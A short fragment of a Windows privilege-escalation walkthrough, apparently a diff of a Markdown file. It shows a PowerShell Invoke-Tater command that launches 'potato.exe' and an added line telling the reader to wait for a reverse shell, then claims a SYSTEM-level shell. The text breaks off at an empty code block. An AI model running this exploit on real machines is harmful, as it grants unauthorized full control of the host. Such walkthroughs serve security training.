J3rryBl4nks/LPEWalkthrough/Walkthrough.md

 ````
 PS C:\Users\user\Downloads> Invoke-Tater -Trigger 1 -Command "C:\Users\user\Downloads\potato.exe"
 ````

+### Due to the nature of this exploit, the time to complete and elevate is heavily variable, be patient and watch for your revshell. ###

 And then in short order we get our reverse shell as NT\System:

 ````